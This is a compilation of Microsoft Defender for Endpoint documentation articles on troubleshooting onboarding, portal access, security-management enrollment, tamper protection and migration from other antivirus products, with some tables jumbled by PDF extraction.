Defender for Endpoint overview
Article • 11/15/2023
） Important

Applies to:

Microsoft Defender for Cloud Apps is a comprehensive solution that gives visibility into
cloud apps and services by allowing you to control and limit access to cloud apps, while
enforcing compliance requirements on data stored in the cloud. For more information,
see Defender for Cloud Apps.
７ Note
This feature is available with an E5 license for Enterprise Mobility + Security on

devices running Windows 10 version 1809 or later, or Windows 11.
Microsoft Defender for Endpoint and Defender

for Cloud Apps integration
Defender for Cloud Apps discovery relies on cloud traffic logs being forwarded to it
from enterprise firewall and proxy servers. Microsoft Defender for Endpoint integrates
with Defender for Cloud Apps by collecting and forwarding all cloud app networking
activities, providing unparalleled visibility to cloud app usage. The monitoring
functionality is built into the device, providing complete coverage of network activity.
https://www.microsoft.com/en-us/videoplayer/embed/RE4r4yQ?postJsllMsg=true
The integration provides the following major improvements to the existing Defender for
Cloud Apps discovery:
Available everywhere - Since the network activity is collected directly from the
endpoint, it's available wherever the device is, on or off corporate network, as it's
no longer depended on traffic routed through the enterprise firewall or proxy
servers.
Works out of the box, no configuration required - Forwarding cloud traffic logs to
Defender for Cloud Apps requires firewall and proxy server configuration. With the
Defender for Endpoint and Defender for Cloud Apps integration, there's no
configuration required. Just switch it on in Microsoft Defender XDR settings and
you're good to go.
Device context - Cloud traffic logs lack device context. Defender for Endpoint
network activity is reported with the device context (which device accessed the
cloud app), so you are able to understand exactly where (device) the network
activity took place, in addition to who (user) performed it.
For more information about cloud discovery, see Working with discovered apps.
Related topic
Configure Microsoft Defender for Cloud Apps integration
 Tip
Feedback

Troubleshoot Microsoft Defender for Endpoint
onboarding issues
Article • 06/14/2023
Applies to:

Windows Server 2016
You might need to troubleshoot the Microsoft Defender for Endpoint onboarding process if you
encounter issues. This page provides detailed steps to troubleshoot onboarding issues that might occur
when deploying with one of the deployment tools and common errors that might occur on the devices.
Before you start troubleshooting issues with onboarding tools, it's important to check if the minimum
requirements are met for onboarding devices to the services. Learn about the licensing, hardware, and
software requirements to onboard devices to the service.
Troubleshoot issues with onboarding tools

If you've completed the onboarding process and don't see devices in the Devices list after an hour, it
might indicate an onboarding or connectivity problem.
Troubleshoot onboarding when deploying with Group Policy

Deployment with Group Policy is done by running the onboarding script on the devices. The Group
Policy console doesn't indicate if the deployment has succeeded or not.
If you've completed the onboarding process and don't see devices in the Devices list after an hour, you
can check the output of the script on the devices. For more information, see Troubleshoot onboarding
when deploying with a script.
If the script completes successfully, see Troubleshoot onboarding issues on the devices for additional
errors that might occur.
Troubleshoot onboarding issues when deploying with Microsoft

Endpoint Configuration Manager
When onboarding devices using the following versions of Configuration Manager:

System Center 2012 Configuration Manager
Deployment with the above-mentioned versions of Configuration Manager is done by running the
onboarding script on the devices. You can track the deployment in the Configuration Manager Console.
If the deployment fails, you can check the output of the script on the devices.
If the onboarding completed successfully but the devices aren't showing up in the Devices list after an
hour, see Troubleshoot onboarding issues on the device for additional errors that might occur.
Troubleshoot onboarding when deploying with a script

Check the result of the script on the device:
1. Click Start, type Event Viewer, and press Enter.
2. Go to Windows Logs > Application.
3. Look for an event from WDATPOnboarding event source.
If the script fails and the event is an error, you can check the event ID in the following table to help you
troubleshoot the issue.
７ Note
The following event IDs are specific to the onboarding script only.
ﾉ Expand table
Event Error Type Resolution steps

ID
5 Offboarding data was Check the permissions on the registry, specifically

found but couldn't be HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection .
deleted
10 Onboarding data Check the permissions on the registry, specifically

couldn't be written to HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection .
registry
Verify that the script has been run as an administrator.
15 Failed to start SENSE Check the service health ( sc query sense command). Make sure it's not in an
service intermediate state ('Pending_Stopped', 'Pending_Running') and try to run the script
again (with administrator rights).
If the device is running Windows 10, version 1607 and running the command sc
query sense returns START_PENDING , reboot the device. If rebooting the device
doesn't address the issue, upgrade to KB4015217 and try onboarding again.
15 Failed to start SENSE If the message of the error is: System error 577 or error 1058 has occurred, you
service need to enable the Microsoft Defender Antivirus ELAM driver, see Ensure that
Microsoft Defender Antivirus is not disabled by a policy for instructions.
Event Error Type Resolution steps
ID
30 The script failed to The service could have taken more time to start or has encountered errors while
wait for the service to trying to start. For more information on events and errors related to SENSE, see
start running Review events and errors using Event viewer.
35 The script failed to When the SENSE service starts for the first time, it writes onboarding status to the
find needed registry location
onboarding status HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status .
registry value
The script failed to find it after several seconds. You can manually test it and
check if it's there. For more information on events and errors related to SENSE,
see Review events and errors using Event viewer.
40 SENSE service The SENSE service has failed to onboard properly. For more information on
onboarding status isn't events and errors related to SENSE, see Review events and errors using Event
set to 1 viewer.
65 Insufficient privileges Run the script again with administrator privileges.
70 Offboarding script is Get an offboarding script for the correct organization that the SENSE service is
for a different onboarded to.
organization
Troubleshoot onboarding issues using Microsoft Intune

You can use Microsoft Intune to check error codes and attempt to troubleshoot the cause of the issue.
If you have configured policies in Intune and they aren't propagated on devices, you might need to
configure automatic MDM enrollment.
Use the following tables to understand the possible causes of issues while onboarding:
Microsoft Intune error codes and OMA-URIs table

Known issues with non-compliance table
Mobile Device Management (MDM) event logs table
If none of the event logs and troubleshooting steps work, download the Local script from the Device
management section of the portal, and run it in an elevated command prompt.
Microsoft Intune error codes and OMA-URIs
ﾉ Expand table
Error Code Error Code Error OMA-URI Possible cause and troubleshooting steps
Hex Dec Description
0x87D1FDE8 -2016281112 Remediation Onboarding Possible cause: Onboarding or offboarding failed on a

failed Offboarding wrong blob: wrong signature or missing PreviousOrgIds
fields.
Error Code Error Code Error OMA-URI Possible cause and troubleshooting steps
Hex Dec Description
Troubleshooting steps:
Check the event IDs in the View agent onboarding errors

in the device event log section.
Check the MDM event logs in the following table or

follow the instructions in Diagnose MDM failures in
Windows.
Onboarding Possible cause: Microsoft Defender for Endpoint Policy

Offboarding registry key doesn't exist or the OMA DM client doesn't
have permissions to write to it.
SampleSharing
Troubleshooting steps: Ensure that the following registry
key exists:
Advanced Threat Protection
If it doesn't exist, open an elevated command and add

the key.
SenseIsRunning Possible cause: An attempt to remediate by read-only

OnboardingState property. Onboarding has failed.
OrgId Troubleshooting steps: Check the troubleshooting steps

in Troubleshoot onboarding issues on the device.
Check the MDM event logs in the following table or

follow the instructions in Diagnose MDM failures in
Windows.
All Possible cause: Attempt to deploy Microsoft Defender

for Endpoint on non-supported SKU/Platform,
particularly Holographic SKU.
Currently supported platforms:
Enterprise, Education, and Professional.
Server isn't supported.
0x87D101A9 -2016345687 SyncML(425): All Possible cause: Attempt to deploy Microsoft Defender
The for Endpoint on non-supported SKU/Platform,
requested particularly Holographic SKU.
command
failed Currently supported platforms:
because the
Enterprise, Education, and Professional.
sender
doesn't have
adequate
access
control
permissions
(ACL) on the
recipient.
Known issues with non-compliance
The following table provides information on issues with non-compliance and how you can address the
issues.
ﾉ Expand table
Case Symptoms Possible cause and troubleshooting steps
1 Device is compliant by SenseIsRunning Possible cause: Check that user passed OOBE after Windows
OMA-URI. But is non-compliant by OrgId, installation or upgrade. During OOBE onboarding couldn't be
Onboarding and OnboardingState OMA- completed but SENSE is running already.
URIs.
Troubleshooting steps: Wait for OOBE to complete.
2 Device is compliant by OrgId, Onboarding, Possible cause: Sense service's startup type is set as "Delayed
and OnboardingState OMA-URIs, but is Start". Sometimes this causes the Microsoft Intune server to
non-compliant by SenseIsRunning OMA- report the device as non-compliant by SenseIsRunning when
URI. DM session occurs on system start.
Troubleshooting steps: The issue should automatically be fixed

within 24 hours.
3 Device is non-compliant Troubleshooting steps: Ensure that Onboarding and

Offboarding policies aren't deployed on the same device at
same time.
Mobile Device Management (MDM) event logs

View the MDM event logs to troubleshoot issues that might arise during onboarding:
Log name: Microsoft\Windows\DeviceManagement-EnterpriseDiagnostics-Provider
Channel name: Admin
ﾉ Expand table
ID Severity Event description Troubleshooting steps
1819 Error Microsoft Defender for Endpoint CSP: Failed to Set Node's Download the Cumulative Update
Value. NodeId: (%1), TokenName: (%2), Result: (%3). for Windows 10, 1607 .
Troubleshoot onboarding issues on the device

If the deployment tools used do not indicate an error in the onboarding process, but devices are still not
appearing in the devices list in an hour, go through the following verification topics to check if an error
occurred with the Microsoft Defender for Endpoint agent.
View agent onboarding errors in the device event log

Ensure the diagnostic data service is enabled
Ensure the service is set to start
Ensure the device has an Internet connection
Ensure that Microsoft Defender Antivirus is not disabled by a policy
View agent onboarding errors in the device event log

1. Click Start, type Event Viewer, and press Enter.
2. In the Event Viewer (Local) pane, expand Applications and Services Logs > Microsoft > Windows
> SENSE.
７ Note
SENSE is the internal name used to refer to the behavioral sensor that powers Microsoft
3. Select Operational to load the log.
4. In the Action pane, click Filter Current log.
5. On the Filter tab, under Event level: select Critical, Warning, and Error, and click OK.
6. Events which can indicate issues appear in the Operational pane. You can attempt to troubleshoot
them based on the solutions in the following table:
ﾉ Expand table
Event Message Resolution steps

ID
5 Microsoft Defender for Endpoint service failed to connect Ensure the device has Internet access.
to the server at variable
6 Microsoft Defender for Endpoint service isn't onboarded Run the onboarding script again.
and no onboarding parameters were found. Failure code:
variable
7 Microsoft Defender for Endpoint service failed to read the Ensure the device has Internet access, then
onboarding parameters. Failure code: variable run the entire onboarding process again.
9 Microsoft Defender for Endpoint service failed to change If the event happened during onboarding,
its start type. Failure code: variable reboot and re-attempt running the
onboarding script. For more information, see
Run the onboarding script again.
If the event happened during offboarding,

contact support.
10 Microsoft Defender for Endpoint service failed to persist If the event happened during onboarding,
the onboarding information. Failure code: variable re-attempt running the onboarding script.
For more information, see Run the
onboarding script again.
If the problem persists, contact support.
15 Microsoft Defender for Endpoint can't start command Ensure the device has Internet access.
channel with URL: variable
17 Microsoft Defender for Endpoint service failed to change Run the onboarding script again. If the
the Connected User Experiences and Telemetry service problem persists, contact support.
location. Failure code: variable
25 Microsoft Defender for Endpoint service failed to reset Contact support.

health status in the registry. Failure code: variable
27 Failed to enable Microsoft Defender for Endpoint mode in Contact support.

Windows Defender. Onboarding process failed. Failure
code: variable
29 Failed to read the offboarding parameters. Error type: %1, Ensure the device has Internet access, then
Error code: %2, Description: %3 run the entire offboarding process again.
30 Failed to disable $(build.sense.productDisplayName) mode Contact support.

in Microsoft Defender for Endpoint. Failure code: %1
32 $(build.sense.productDisplayName) service failed to Verify that the service start type is manual
request to stop itself after offboarding process. Failure and reboot the device.
code: %1
55 Failed to create the Secure ETW autologger. Failure code: Reboot the device.
%1
Event Message Resolution steps
ID
63 Updating the start type of external service. Name: %1, Identify what is causing changes in start type
actual start type: %2, expected start type: %3, exit code: %4 of mentioned service. If the exit code isn't 0,
fix the start type manually to expected start
type.
64 Starting stopped external service. Name: %1, exit code: %2 Contact support if the event keeps re-
appearing.
68 The start type of the service is unexpected. Service name: Identify what is causing changes in start
%1, actual start type: %2, expected start type: %3 type. Fix mentioned service start type.
69 The service is stopped. Service name: %1 Start the mentioned service. Contact support
if the issue persists.
There are additional components on the device that the Microsoft Defender for Endpoint agent
depends on to function properly. If there are no onboarding related errors in the Microsoft Defender for
Endpoint agent event log, proceed with the following steps to ensure that the additional components
are configured correctly.
７ Note
In Windows 10 build 1809 and later, the Defender for Endpoint EDR service no longer has a direct
dependency on the DiagTrack service. The EDR cyber evidence can still be uploaded if this service is
not running.
If the devices aren't reporting correctly, you might need to check that the Windows diagnostic data
service is set to automatically start and is running on the device. The service might have been disabled
by other programs or user configuration changes.
First, you should check that the service is set to start automatically when Windows starts, then you
should check that the service is currently running (and start it if it isn't).
Ensure the service is set to start

Use the command line to check the Windows diagnostic data service startup type:
a. Click Start, type cmd, and press Enter.
Console
sc qc diagtrack
If the service is enabled, then the result should look like the following screenshot:
If the START_TYPE isn't set to AUTO_START , then you need to set the service to automatically start.
Use the command line to set the Windows diagnostic data service to automatically start:
a. Click Start, type cmd, and press Enter.
Console
sc config diagtrack start=auto
3. A success message is displayed. Verify the change by entering the following command, and press
Enter:
Console
sc qc diagtrack
4. Start the service. In the command prompt, type the following command and press Enter:
Console
sc start diagtrack
Ensure the device has an Internet connection

The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report
sensor data and communicate with the Microsoft Defender for Endpoint service.
WinHTTP is independent of the Internet browsing proxy settings and other user context applications
and must be able to detect the proxy servers that are available in your particular environment.
To ensure that sensor has service connectivity, follow the steps described in the Verify client connectivity
to Microsoft Defender for Endpoint service URLs topic.
If the verification fails and your environment is using a proxy to connect to the Internet, then follow the
steps described in Configure proxy and Internet connectivity settings topic.
Ensure that Microsoft Defender Antivirus is not disabled by a policy
） Important
The following only applies to devices that have not yet received the August 2020 (version
4.18.2007.8) update to Microsoft Defender Antivirus.
The update ensures that Microsoft Defender Antivirus cannot be turned off on client devices via
system policy.
Problem: The Microsoft Defender for Endpoint service doesn't start after onboarding.
Symptom: Onboarding successfully completes, but you see error 577 or error 1058 when trying to start
the service.
Solution: If your devices are running a third-party antimalware client, the Microsoft Defender for
Endpoint agent needs the Early Launch Antimalware (ELAM) driver to be enabled. You must ensure that
it's not turned off by a system policy.
Depending on the tool that you use to implement policies, you need to verify that the following
Windows Defender policies are cleared:
DisableAntiSpyware
DisableAntiVirus
For example, in Group Policy there should be no entries such as the following values:
<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0"
ValueKind="DWord" Name="DisableAntiSpyware"/></Key>
<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0"
ValueKind="DWord" Name="DisableAntiVirus"/></Key>
） Important
The disableAntiSpyware setting is discontinued and will be ignored on all Windows 10 devices, as
of the August 2020 (version 4.18.2007.8) update to Microsoft Defender Antivirus.
After clearing the policy, run the onboarding steps again.

You can also check the previous registry key values to verify that the policy is disabled, by opening
the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender .
７ Note
All Windows Defender services (wdboot, wdfilter, wdnisdrv, wdnissvc, and windefend) should
be in their default state. Changing the startup of these services is unsupported and may force
you to reimage your system.
Example default configurations for WdBoot and WdFilter:

<Key Path="SYSTEM\CurrentControlSet\Services\WdBoot"><KeyValue Value="0"
ValueKind="DWord" Name="Start"/></Key>
<Key Path="SYSTEM\CurrentControlSet\Services\WdFilter"><KeyValue Value="0"
ValueKind="DWord" Name="Start"/></Key>
Troubleshoot onboarding issues
７ Note
The following troubleshooting guidance is only applicable for Windows Server 2016 and lower.
If you encounter issues while onboarding a server, go through the following verification steps to address
possible issues.
Ensure Microsoft Monitoring Agent (MMA) is installed and configured to report sensor data to the
service
Ensure that the server proxy and Internet connectivity settings are configured properly
You might also need to check the following:
Check that there's a Microsoft Defender for Endpoint Service running in the Processes tab in Task
Manager. For example:

Check Event Viewer > Applications and Services Logs > Operation Manager to see if there are
any errors.
In Services, check if the Microsoft Monitoring Agent is running on the server. For example,
In Microsoft Monitoring Agent > Azure Log Analytics (OMS), check the Workspaces and verify
that the status is running.
Check to see that devices are reflected in the Devices list in the portal.
Confirming onboarding of newly built devices
There may be instances when onboarding is deployed on a newly built device but not completed.
The steps below provide guidance for the following scenario:
Onboarding package is deployed to newly built devices

Sensor doesn't start because the Out-of-box experience (OOBE) or first user logon hasn't been
completed
Device is turned off or restarted before the end user performs a first logon
In this scenario, the SENSE service won't start automatically even though onboarding package was
deployed
７ Note
User Logon after OOBE is no longer required for SENSE service to start on the following or more
recent Windows versions: Windows 10, version 1809 or Windows Server 2019, or Windows Server
2022 with April 22 2021 update rollup . Windows 10, version 1909 with April 2021 update
rollup . Windows 10, version 2004/20H2 with April 28 2021 update rollup .
７ Note
The following steps are only relevant when using Microsoft Endpoint Configuration Manager. For
more information about onboarding using Microsoft Endpoint Configuration Manager, see
1. Create an application in Microsoft Endpoint Configuration Manager.


2. Select Manually specify the application information.


3. Specify information about the application, then select Next.


4. Specify information about the software center, then select Next.


5. In Deployment types select Add.


6. Select Manually specify the deployment type information, then select Next.

7. Specify information about the deployment type, then select Next.


8. In Content > Installation program specify the command: net start sense .

9. In Detection method, select Configure rules to detect the presence of this deployment type, then
select Add Clause.

10. Specify the following detection rule details, then select OK:

11. In Detection method select Next.


12. In User Experience, specify the following information, then select Next:

13. In Requirements, select Next.


14. In Dependencies, select Next.


15. In Summary, select Next.


16. In Completion, select Close.


17. In Deployment types, select Next.




The status is then displayed:


20. You can now deploy the application by right-clicking the app and selecting Deploy.

21. In General select Automatically distribute content for dependencies and Browse.

22. In Content select Next.


23. In Deployment settings, select Next.


24. In Scheduling select As soon as possible after the available time, then select Next.

25. In User experience, select Commit changes at deadline or during a maintenance window
(requires restarts), then select Next.

26. In Alerts select Next.




The status is then displayed


Related topics
Onboard devices
Configure device proxy and Internet connectivity settings
 Tip
Feedback

Troubleshoot subscription and portal
access issues
Article • 11/15/2023
Applies to:

This page provides detailed steps to troubleshoot issues that might occur when setting
up your Microsoft Defender for Endpoint service.
If you receive an error message, Microsoft Defender XDR will provide a detailed
explanation on what the issue is and relevant links will be supplied.
No subscriptions found
If while accessing Microsoft Defender XDR you get a No subscriptions found message,
it means the Microsoft Entra ID used to log in the user to the portal, does not have a
Microsoft Defender for Endpoint license.
Potential reasons:
The Windows E5 and Office E5 licenses are separate licenses.

The license was purchased but not provisioned to this Microsoft Entra instance.
It could be a license provisioning issue.
It could be you inadvertently provisioned the license to a different Microsoft
Entra ID than the one used for authentication into the service.
For both cases, you should contact Microsoft support at General Microsoft Defender for
Endpoint Support or Volume license support .

Your subscription has expired

If while accessing Microsoft Defender XDR you get a Your subscription has expired
message, your online service subscription has expired. Microsoft Defender for Endpoint
subscription, like any other online service subscription, has an expiration date.
You can choose to renew or extend the license at any point in time. When accessing the
portal after the expiration date a Your subscription has expired message will be
presented with an option to download the device offboarding package, should you
choose to not renew the license.
７ Note
For security reasons, the package used to Offboard devices will expire 30 days after
the date it was downloaded. Expired offboarding packages sent to a device will be
rejected. When downloading an offboarding package you will be notified of the
packages expiry date and it will also be included in the package name.

You are not authorized to access the portal
If you receive a You are not authorized to access the portal, be aware that Microsoft
Defender for Endpoint is a security monitoring, incident investigation and response
product, and as such, access to it is restricted and controlled by the user. For more
information, see, Assign user access to the portal.
Data currently isn't available on some sections

of the portal
If the portal dashboard and other sections show an error message such as "Data
currently isn't available":
You'll need to allow the security.windows.com and all subdomains under it on your web
browser. For example, *.security.windows.com .
Portal communication issues
If you encounter issues with accessing the portal, missing data, or restricted access to
portions of the portal, you'll need to verify that the following URLs are allowed and open
for communication.
*.blob.core.windows.net
crl.microsoft.com
https://*.microsoftonline-p.com
https://*.security.microsoft.com
https://automatediracs-eus-prd.security.microsoft.com
https://login.microsoftonline.com
https://login.windows.net
https://onboardingpackagescusprd.blob.core.windows.net
https://secure.aadcdn.microsoftonline-p.com
https://security.microsoft.com
https://static2.sharepointonline.com
 Tip
Feedback

Troubleshoot onboarding issues related
to Security Management for Microsoft
Article • 12/15/2023
Applies to:

Security Management for Microsoft Defender for Endpoint is a capability for devices
that aren't managed by Microsoft Intune to receive security configurations. For more
information on Security Management for Microsoft Defender for Endpoint, see Manage
Microsoft Defender for Endpoint on devices with Microsoft Intune.
For Security Management for Microsoft Defender for Endpoint onboarding instructions,
see Microsoft Defender for Endpoint Security Configuration Management
For more information about the client analyzer, see Troubleshoot sensor health using
Microsoft Defender for Endpoint Client Analyzer.
Run Microsoft Defender for Endpoint Client

Analyzer on Windows
Consider running the Client Analyzer on endpoints that are failing to complete the
Security Management for Microsoft Defender for Endpoint onboarding flow. For more
information about the client analyzer, see Troubleshoot sensor health using Microsoft
Defender for Endpoint Client Analyzer.
The Client Analyzer output file (MDE Client Analyzer Results.htm) can provide key
troubleshooting information:
Verify that the device OS is in scope for Security Management for Microsoft
Defender for Endpoint onboarding flow in General Device Details section
Verify that the device appears in Microsoft Entra ID in Device Configuration

Management Details

In the Detailed Results section of the report, the Client Analyzer also provides
actionable guidance.
 Tip
Make sure the Detailed Results section of the report does not include any "Errors",
and make sure to review all "Warning" messages.
General troubleshooting
If you weren't able to identify the onboarded device in Microsoft Entra ID or in the
Intune admin center, and didn't receive an error during the enrollment, checking the
registry key
Computer\\HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\SenseCM\\EnrollmentStatus can
provide additional troubleshooting information.
The following table lists errors and directions on what to try/check in order to address
the error. Note that the list of errors isn't complete and is based on typical/common
errors encountered by customers in the past:
ﾉ Expand table
Error Code Enrollment Status Administrator Actions
5-7 , 9 , 11- General error The device was successfully onboarded to Microsoft
12 , 26-33 Defender for Endpoint. However, there was an error in the
security configuration management flow. This could be due
to the device not meeting prerequisites for Microsoft
Defender for Endpoint management channel. Running the
Client Analyzer on the device can help identify the root
cause of the issue. If this doesn't help, contact support.
8 , 44 Microsoft Intune The device was successfully onboarded to Microsoft

Configuration Defender for Endpoint. However, Microsoft Intune hasn't
issue been configured through the Admin Center to allow
Microsoft Defender for Endpoint Security Configuration.
Make sure the Microsoft Intune tenant is configured and the
feature is turned on.
13- Connectivity issue The device was successfully onboarded to Microsoft

14 , 20 , 24 , 25 Defender for Endpoint. However, there was an error in the
security configuration management flow, which could be
due to a connectivity issue. Verify that the Microsoft Entra ID
and Microsoft Intune endpoints are opened in your firewall.
10 , 42 General Hybrid The device was successfully onboarded to Microsoft

join failure Defender for Endpoint. However, there was an error in the
security configuration management flow and the OS failed
to perform hybrid join. Use Troubleshoot Microsoft Entra
hybrid joined devices for troubleshooting OS-level hybrid
join failures.
15 Tenant mismatch The device was successfully onboarded to Microsoft

Defender for Endpoint. However, there was an error in the
security configuration management flow because your
Microsoft Defender for Endpoint tenant ID doesn't match
your Microsoft Entra tenant ID. Make sure that the Microsoft
Entra tenant ID from your Defender for Endpoint tenant
matches the tenant ID in the SCP entry of your domain. For
more details, Troubleshoot onboarding issues related to
Security Management for Microsoft Defender for Endpoint.
16 , 17 Hybrid error - The device was successfully onboarded to Microsoft

Service Defender for Endpoint. However, Service Connection Point
Connection Point (SCP) record isn't configured correctly and the device
couldn't be joined to Microsoft Entra ID. This could be due
to the SCP being configured to join Enterprise DRS. Make
sure the SCP record points to Microsoft Entra ID and SCP is
configured following best practices. For more information,
see Configure a service connection point.
18 Certificate error The device was successfully onboarded to Microsoft

security configuration management flow due to a device
certificate error. The device certificate belongs to a different
tenant. Verify that best practices are followed when creating
trusted certificate profiles.
36 , 37 Microsoft Entra The device was successfully onboarded to Microsoft

Connect Defender for Endpoint. However, there was an error in the
misconfiguration security configuration management flow due to a
misconfiguration in Microsoft Entra Connect. To identify
what is preventing the device from registering to Microsoft
Entra ID, consider running the Device Registration
Troubleshooter Tool. For Windows Server 2012 R2, run the
dedicated troubleshooting instructions.
38 , 41 DNS error The device was successfully onboarded to Microsoft

security configuration management flow due to a DNS error.
Check the internet connection and/or DNS settings on the
device. The invalid DNS settings might be on the
workstation's side. Active Directory requires you to use
domain DNS to work properly (and not the router's

address). For more information, see Troubleshoot
onboarding issues related to Security Management for
40 Clock sync issue The device was successfully onboarded to Microsoft

security configuration management flow. Verify that the
clock is set correctly and is synced on the device where the
error occurs.
43 MDE and The device is managed using Configuration Manager and

ConfigMgr Microsoft Defender for Endpoint. Controlling policies
through both channels may cause conflicts and undesired
results. To avoid this, endpoint security policies should be
isolated to a single control plane.
Related topic
 Tip
Feedback

Troubleshoot problems with
tamper protection
FAQ
Tamper protection is preventing my

security team from managing a device.
What should we do?
If tamper protection prevents your IT or security team from performing a necessary task
on a device, consider using troubleshooting mode. After troubleshooting mode ends,
any changes made to tamper-protected settings are reverted to their configured state.
Changes to Microsoft Defender

Antivirus settings using Group Policy are
ignored. Why is this happening, and
what can we do about it?
If you're using Group Policy to manage Microsoft Defender Antivirus settings, keep in
mind that tamper protection can block changes to certain settings in Microsoft
Defender Antivirus. When you use Group Policy to make changes to Microsoft Defender
Antivirus settings and the tamper protection is on, changes to tamper-protected
settings are ignored. For more information, see What happens when tamper protection
is turned on?
Depending on your particular scenario, you have several options available:
If you must make changes to a device and tamper protection is blocking those
changes, you can use troubleshooting mode to temporarily disable tamper
protection on the device. After troubleshooting mode ends, any changes made to
tamper-protected settings are reverted to their configured state.
protection.
How do we protect exclusions for
Microsoft Defender Antivirus?
1. Ensure that all of the following requirements are met:
Devices are running Windows Defender platform 4.18.2211.5 or later. (See

Monthly platform and engine versions.)
DisableLocalAdminMerge is enabled. (See DisableLocalAdminMerge.)
Tamper protection is deployed through Intune, and only Intune is used to

manage devices.
Microsoft Defender Antivirus exclusions are managed in Microsoft Intune.

(See Settings for Microsoft Defender Antivirus policy in Microsoft Intune for
Windows devices.)
2. Confirm that only Intune manages the device. Go to

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender (or
HKLM\SOFTWARE\Microsoft\Windows Defender ), and look for a REG_DWORD entry called
ManagedDefenderProductType.
If ManagedDefenderProductType has a value of 6 , then the device is

managed by Intune only (this value is required to protect Microsoft Defender
Antivirus exclusions).
If ManagedDefenderProductType has a value of 7 , then the device is

comanaged, such as by Intune and Configuration Manager (this value
indicates that exclusions aren't currently tamper protected).
3. Confirm that tamper protection is deployed and that Microsoft Defender Antivirus
exclusions are protected. Go to
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features (or
HKLM\SOFTWARE\Microsoft\Windows Defender\Features ), and look for a REG_DWORD
entry called TPExclusions.
If TPExclusions has a value of 1 , then all required conditions are met, and the
new functionality to protect exclusions is enabled on the device. In this case,
exclusions are tamper protected.
If TPExclusions has a value of 0 , then tamper protection isn't currently

protecting exclusions on the device. (If you meet all the requirements and this
state seems incorrect, contact support.)
Ｕ Caution
Don't change the value of the registry keys. Use the preceding procedure for
information only. Changing keys have no effect on whether tamper protection
applies to exclusions.
Feedback

Troubleshooting issues when migrating
to Microsoft Defender for Endpoint
Article • 04/24/2023
Applies to:

This article provides troubleshooting information for security administrators who are
experiencing issues when moving from a non-Microsoft endpoint protection solution to
Microsoft Defender Antivirus is getting

uninstalled on Windows Server
When you migrate to Defender for Endpoint, you begin with your non-Microsoft
antivirus/antimalware protection in active mode. As part of the setup process, you
configure Microsoft Defender Antivirus in passive mode. Occasionally, your non-
Microsoft antivirus/antimalware solution might prevent Microsoft Defender Antivirus
from running on Windows Server. In fact, it can look like Microsoft Defender Antivirus
has been removed from Windows Server.
To resolve this issue, take the following steps:
1. Add Microsoft Defender for Endpoint to the exclusion list.

2. Set Microsoft Defender Antivirus to passive mode manually.
Add Microsoft Defender for Endpoint to the exclusion list
ﾉ Expand table
OS Exclusions
Windows 11 C:\Program Files\Windows Defender Advanced Threat

Protection\MsSense.exe
Windows 10, version
1803 or later (See C:\Program Files\Windows Defender Advanced Threat
Windows 10 release Protection\SenseCncProxy.exe
information)
OS Exclusions

Windows 10, version Protection\SenseSampleUploader.exe
1703 or 1709 with
KB4493441 installed C:\Program Files\Windows Defender Advanced Threat
Protection\SenseIR.exe

Protection\SenseCM.exe

Protection\SenseNdr.exe

Protection\SenseSC.exe

Protection\Classification\SenseCE.exe

Windows Server 2022 On Windows Server 2012 R2 and Windows Server 2016 running the
modern, unified solution, the following exclusions are required after
Windows Server 2019 updating the Sense EDR component using KB5005292 :
Windows Server 2016 C:\ProgramData\Microsoft\Windows Defender Advanced Threat

Protection\Platform\*\MsSense.exe
Windows Server 2012
R2 C:\ProgramData\Microsoft\Windows Defender Advanced Threat
Protection\Platform\*\SenseCnCProxy.exe
Windows Server,
version 1803 C:\ProgramData\Microsoft\Windows Defender Advanced Threat
Protection\Platform\*\SenseIR.exe

Protection\Platform\*\SenseCE.exe

Protection\Platform\*\SenseSampleUploader.exe

Protection\Platform\*\SenseCM.exe

OS Exclusions
Windows 8.1 C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service

State\Monitoring Host Temporary Files 6\45\MsSenseS.exe
Windows 7
NOTE: Monitoring Host Temporary Files 6\45 can be different numbered
Windows Server 2008 subfolders.
R2 SP1
Agent\Agent\AgentControlPanel.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HealthService.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HSLockdown.exe

Agent\Agent\MOMPerfSnapshotHelper.exe

Agent\Agent\MonitoringHost.exe

Agent\Agent\TestCloudConnection.exe
） Important
As a best practice, keep your organization's devices and endpoints up to date.

Make sure to get the latest updates for Microsoft Defender for Endpoint and
Microsoft Defender Antivirus, and keep your organization's operating systems and
productivity apps up to date.
Set Microsoft Defender Antivirus to passive mode

manually
On Windows Server 2022, Windows Server 2019, Windows Server, version 1803 or
newer, Windows Server 2016, or Windows Server 2012 R2, you must set Microsoft
Defender Antivirus to passive mode manually. This action helps prevent problems
caused by having multiple antivirus products installed on a server. You can set Microsoft
Defender Antivirus to passive mode using PowerShell, Group Policy, or a registry key.
You can set Microsoft Defender Antivirus to passive mode by setting the following
registry key:
Type: REG_DWORD
Value: 1
７ Note
For passive mode to work on endpoints running Windows Server 2016 and
Windows Server 2012 R2, those endpoints must be onboarded using the
For more information, see Microsoft Defender Antivirus in Windows.
Microsoft Defender Antivirus seems to be stuck

in passive mode
If Microsoft Defender Antivirus is stuck in passive mode, set it to active mode manually
by following these steps:
1. On your Windows device, open Registry Editor as an administrator.
2. Go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced
Threat Protection .
3. Set or define a REG_DWORD entry called ForceDefenderPassiveMode , and set its

value to 0 .
4. Reboot the device.
） Important
If you're still having trouble setting Microsoft Defender Antivirus to active mode
after following this procedure, contact support.
I am having trouble re-enabling Microsoft

Defender Antivirus on Windows Server 2016
If you are using a non-Microsoft antivirus/antimalware solution on Windows Server
2016, your existing solution might have required Microsoft Defender Antivirus to be
disabled or uninstalled. You can use the Malware Protection Command-Line Utility to re-
enable Microsoft Defender Antivirus on Windows Server 2016.
